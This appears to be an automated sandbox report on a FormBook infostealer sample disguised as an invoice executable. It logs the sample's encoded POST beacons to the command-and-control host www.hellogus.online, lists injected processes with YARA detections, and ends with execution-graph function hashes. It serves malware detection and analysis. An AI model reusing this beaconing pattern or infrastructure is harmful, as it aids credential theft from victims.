Nov 25, 2024 13:58:23.553670883 CET	792	OUT	POST /zrnp/ HTTP/1.1 Host: www.hellogus.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.hellogus.online Referer: http://www.hellogus.online/zrnp/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 32 66 48 76 30 63 76 68 73 6a 30 75 53 2b 78 36 53 2f 58 4b 37 44 6b 36 4b 6f 37 52 42 37 67 30 6d 61 56 45 6d 6a 6f 7a 31 54 63 67 4a 44 54 77 41 74 72 65 6a 36 48 31 68 6b 34 67 6d 78 74 4f 6b 72 53 55 37 4a 49 68 68 33 58 2b 46 4b 35 43 7a 33 50 77 32 55 77 55 4e 56 71 4d 6d 57 6c 62 52 75 61 2b 50 46 56 59 76 33 63 36 52 45 66 4b 72 47 61 52 51 6c 4a 4e 77 42 70 6e 57 76 4c 58 39 67 49 70 57 78 78 6e 48 56 54 4f 68 46 6c 57 63 41 78 30 53 6d 55 33 31 57 36 4e 73 66 4e 44 4f 64 2b 50 73 57 77 7a 49 6c 47 43 6a 34 74 6b 69 70 59 30 36 63 79 61 32 39 4a 67 62 63 77 31 4d 53 56 42 74 78 31 50 45 47 61 6e Data Ascii: 0dfXG=2fHv0cvhsj0uS+x6S/XK7Dk6Ko7RB7g0maVEmjoz1TcgJDTwAtrej6H1hk4gmxtOkrSU7JIhh3X+FK5Cz3Pw2UwUNVqMmWlbRua+PFVYv3c6REfKrGaRQlJNwBpnWvLX9gIpWxxnHVTOhFlWcAx0SmU31W6NsfNDOd+PsWwzIlGCj4tkipY06cya29Jgbcw1MSVBtx1PEGan
Nov 25, 2024 13:58:24.838023901 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:58:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	50048	209.74.64.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:26.990957022 CET	816	OUT	POST /zrnp/ HTTP/1.1 Host: www.hellogus.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.hellogus.online Referer: http://www.hellogus.online/zrnp/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 32 66 48 76 30 63 76 68 73 6a 30 75 55 66 42 36 56 63 2f 4b 35 6a 6c 49 41 49 37 52 55 4c 67 77 6d 61 70 45 6d 69 64 34 31 68 6f 67 48 43 6a 77 44 70 48 65 76 61 48 31 35 55 35 71 6f 52 74 46 6b 72 66 68 37 49 30 68 68 30 72 2b 46 4c 4a 43 7a 45 58 78 33 45 77 57 47 31 71 53 2b 32 6c 62 52 75 61 2b 50 46 42 79 76 33 45 36 52 30 76 4b 35 33 61 57 5a 46 4a 4f 34 68 70 6e 53 76 4c 54 39 67 49 66 57 77 73 4b 48 58 62 4f 68 41 5a 57 63 52 78 7a 42 47 55 39 37 32 36 53 68 71 73 4f 4a 75 62 5a 6b 6b 30 49 64 48 6d 5a 76 75 73 2b 2b 61 59 58 6f 4d 53 59 32 2f 52 53 62 38 77 66 4f 53 74 42 2f 6d 35 6f 4c 79 2f 45 74 37 73 67 35 4e 79 2b 74 2f 66 57 4e 62 39 52 73 56 75 4d 32 51 3d 3d Data Ascii: 0dfXG=2fHv0cvhsj0uUfB6Vc/K5jlIAI7RULgwmapEmid41hogHCjwDpHevaH15U5qoRtFkrfh7I0hh0r+FLJCzEXx3EwWG1qS+2lbRua+PFByv3E6R0vK53aWZFJO4hpnSvLT9gIfWwsKHXbOhAZWcRxzBGU9726ShqsOJubZkk0IdHmZvus++aYXoMSY2/RSb8wfOStB/m5oLy/Et7sg5Ny+t/fWNb9RsVuM2Q==
Nov 25, 2024 13:58:28.248675108 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:58:28 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	50049	209.74.64.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:29.647491932 CET	1829	OUT	POST /zrnp/ HTTP/1.1 Host: www.hellogus.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.hellogus.online Referer: http://www.hellogus.online/zrnp/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 32 66 48 76 30 63 76 68 73 6a 30 75 55 66 42 36 56 63 2f 4b 35 6a 6c 49 41 49 37 52 55 4c 67 77 6d 61 70 45 6d 69 64 34 31 68 77 67 48 77 72 77 42 4f 54 65 75 61 48 31 77 30 35 70 6f 52 74 69 6b 72 32 70 37 49 35 63 68 78 6e 2b 66 70 74 43 69 46 58 78 75 55 77 57 4a 56 71 50 6d 57 6c 4f 52 75 4b 36 50 46 52 79 76 33 45 36 52 32 48 4b 37 6d 61 57 56 6c 4a 4e 77 42 70 72 57 76 4b 47 39 67 51 50 57 77 34 38 47 6b 6a 4f 68 67 70 57 62 6a 5a 7a 43 6d 55 37 34 32 37 48 68 71 70 4f 4a 75 33 64 6b 6c 51 75 64 45 36 5a 74 72 78 70 35 35 52 4d 2f 2f 65 46 6d 75 68 6b 65 63 38 6f 57 79 74 46 70 33 56 47 56 6d 37 45 6d 4c 63 66 36 4f 7a 49 76 64 58 46 4b 71 38 75 76 46 75 42 6e 6a 7a 70 36 44 32 78 42 45 42 4c 32 71 41 75 75 64 30 31 66 4d 57 76 71 71 43 4b 56 5a 4e 44 49 4e 79 66 31 41 4f 79 6e 52 39 45 39 6d 39 48 2b 62 61 4b 63 75 69 4f 79 2b 4f 54 4f 51 41 32 69 6d 41 62 5a 62 52 72 59 4a 6d 45 5a 65 77 4b 79 30 42 4d 65 78 6d 6b 61 48 70 6d 58 69 77 57 30 75 30 31 6f 56 6c 4f 6e 6a 77 69 [TRUNCATED] Data Ascii: 0dfXG=2fHv0cvhsj0uUfB6Vc/K5jlIAI7RULgwmapEmid41hwgHwrwBOTeuaH1w05poRtikr2p7I5chxn+fptCiFXxuUwWJVqPmWlORuK6PFRyv3E6R2HK7maWVlJNwBprWvKG9gQPWw48GkjOhgpWbjZzCmU7427HhqpOJu3dklQudE6Ztrxp55RM//eFmuhkec8oWytFp3VGVm7EmLcf6OzIvdXFKq8uvFuBnjzp6D2xBEBL2qAuud01fMWvqqCKVZNDINyf1AOynR9E9m9H+baKcuiOy+OTOQA2imAbZbRrYJmEZewKy0BMexmkaHpmXiwW0u01oVlOnjwiz49RHJlOlaewKF3zRGRnxYZfOJrJh3x/U3pV9j8k/r4eCTTH19lhvXM0ZIFZOTzaJSmpDCyYdjJlN5DkYsDnskIkJP9b9UMQu1xoJIorj/PpV97gL2S7MKlHjOYNQykXfx/8miecQJTO5M5AuhYDBEZF9mYeO/icIVqqaO4/0i0kKy5V6wHwHoxID5c2LgJUmrFYGQDWAc8yxAYeHbh++UZ/2DpSKSQFCZq5VGhApGTa7hOZ6h9n3MerKRrxK33LgXPBwOLdni1PxvwH28/UL86nNjENwE4+DzMdkvKmKz/yq3Bl7LqZM92CijglhMZUNQQDf/hNj79hysKoBuQGNAB4We9veFV7VUvevjZ8uLSTDDgMINzlfOJ6luQz3DzsiKjBkWcD7I+R0cwP1g/BEBuAi8xG0G7tpa3btsVZwKUq7mkzxGAWBps37yfDBoigq1w571VTN6mYP8Lr2n/et0YEoU1N16MMMYAgYtH+GJn0QclfjCgveTiEMfOHWHWqw3F5224d7rY4Lpnp7EOKvnvPi5CukPSTFOX4mV7cGsCNW7nEdl4KhCleiEpNwQDDSfT6htbSmFYx4PXrtVXA42QKs2jsk2Lf80+F/vDUPKlJfNdiWuC1El6rmRUqpdJT13eWTpJzY/hkwEDlaqIdy0XdOvyE/y51QH [TRUNCATED]
Nov 25, 2024 13:58:31.017966032 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:58:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	50050	209.74.64.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:32.473041058 CET	528	OUT	GET /zrnp/?0dfXG=7dvP3oKbkgtActo7X+aB5i8XRavAV5IyhK19vEIy5gkELgbrMMXbl9nvhn4QjRtqjZGCw7A4nUi7FbRpiGaR0ExHc3mJnAhEafCzKEQKll8qfESIyEeBcE8V5iUbRPjYsxxHG3c=&U0W=7ROlj HTTP/1.1 Host: www.hellogus.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:58:33.808335066 CET	548	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:58:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Target ID:	1
Start time:	07:54:17
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\FACTURA 24V70 VINS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"
Imagebase:	0xd30000
File size:	806'912 bytes
MD5 hash:	6E3917643D8C875E3F45C265B82CCA9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:54:20
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\FACTURA 24V70 VINS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"
Imagebase:	0xc40000
File size:	806'912 bytes
MD5 hash:	6E3917643D8C875E3F45C265B82CCA9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:55:35
Start date:	25/11/2024
Path:	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe"
Imagebase:	0xe50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:55:38
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cacls.exe"
Imagebase:	0x320000
File size:	27'648 bytes
MD5 hash:	00BAAE10C69DAD58F169A3ED638D6C59
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	07:55:52
Start date:	25/11/2024
Path:	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe"
Imagebase:	0xe50000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	07:56:07
Start date:	25/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.2%
Total number of Nodes:	497
Total number of Limit Nodes:	43

Executed Functions

Function 056ECCA6 Relevance: 1.8, Strings: 1, Instructions: 563
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 056ECCAB

Memory Dump Source

Source File: 00000001.00000002.2208864792.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56e0000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 9400cde97a33a89d042a72b8abd5f878de669fc5ba3387a19e71dc4f73c628f8
Instruction ID: e68e269d4723d5dae4260aef48de2935f8ae70078b25895def0da5e7605e9085
Opcode Fuzzy Hash: 9400cde97a33a89d042a72b8abd5f878de669fc5ba3387a19e71dc4f73c628f8
Instruction Fuzzy Hash: 0D52A574A112298FDB54DF64D898B9DBBB2FF89310F1081E9D509A7365DB30AE81CF90

Function 07605F68 Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07606037

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 7e20d9b469d67e14c89c19a36388b48f3848f0b05d30cc77a55a86efa69e49d0
Instruction ID: 36c0dc06d93e789a0d82abe97fa1cb2614d6f0d5ccdd54ed91bda38bde3b5498
Opcode Fuzzy Hash: 7e20d9b469d67e14c89c19a36388b48f3848f0b05d30cc77a55a86efa69e49d0
Instruction Fuzzy Hash: 302155B69043999FCB10CFA9C884ACEBFF4BF49310F14845AE959A7351C379A904CBA1

Function 07600804 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 07606037

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 8793c2b50db69fc686c151b9bad23c66c04ba26ce4f9be7287a14c673db5701a
Instruction ID: c15819a9db85100fc0c59df9a1dd9a6aa3f42cb80f5005aff01abe807b5d2e4c
Opcode Fuzzy Hash: 8793c2b50db69fc686c151b9bad23c66c04ba26ce4f9be7287a14c673db5701a
Instruction Fuzzy Hash: 9421DEB6900359DFCB10DF9AD984ADEFBF4FB48310F10842AE919A7250D3B5A954CFA4

Function 056E9D18 Relevance: .7, Instructions: 720COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2208864792.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_56e0000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748b85bcbd85e91754c3c1bd649409261992c30bc8f92b55584d373806f6eb8f
Instruction ID: 8a1c14e02e816d056d6311199e01fe7d9bab099cde052158f7401f109b2a0075
Opcode Fuzzy Hash: 748b85bcbd85e91754c3c1bd649409261992c30bc8f92b55584d373806f6eb8f
Instruction Fuzzy Hash: FB526335B02115DFDB14DFA9C888A6EBBB2BF84750F158169E806DB764DB31EC42CB90

Function 07626084 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2210176128.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7620000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 874483c89459b51f335d7f8e4fe95e7cdd5df24690083b3a2fe35ae49d3d5fca
Instruction ID: 86f62c3edc9daf53a77c997447b8ac465e143eac74b73e4f0fe53e7446bcf3d5
Opcode Fuzzy Hash: 874483c89459b51f335d7f8e4fe95e7cdd5df24690083b3a2fe35ae49d3d5fca
Instruction Fuzzy Hash: C1326E70E006298FDB94DFB9C850B9EBBB2AF84300F14856AD50AAB385DF349D46CF55

Function 076032B0 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1855bb4a96efc324bfbcf6a477a3b24852de23050506fb719c8ad713a936ff
Instruction ID: 2e870d8b467d8cace2c022b07c2fc3e13779afc72cc4cc5b2da439095e7b8539
Opcode Fuzzy Hash: fa1855bb4a96efc324bfbcf6a477a3b24852de23050506fb719c8ad713a936ff
Instruction Fuzzy Hash: 114272B8E11229CFDB54CFA9C985B9DBBB2BF48301F1481A9E809A7355D731AD81CF50

Function 07601FE0 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2209698243.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7600000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d78010a3de29622c23dcd6274348f9a9af71232bff27e86e79d7b15a02a5f2c
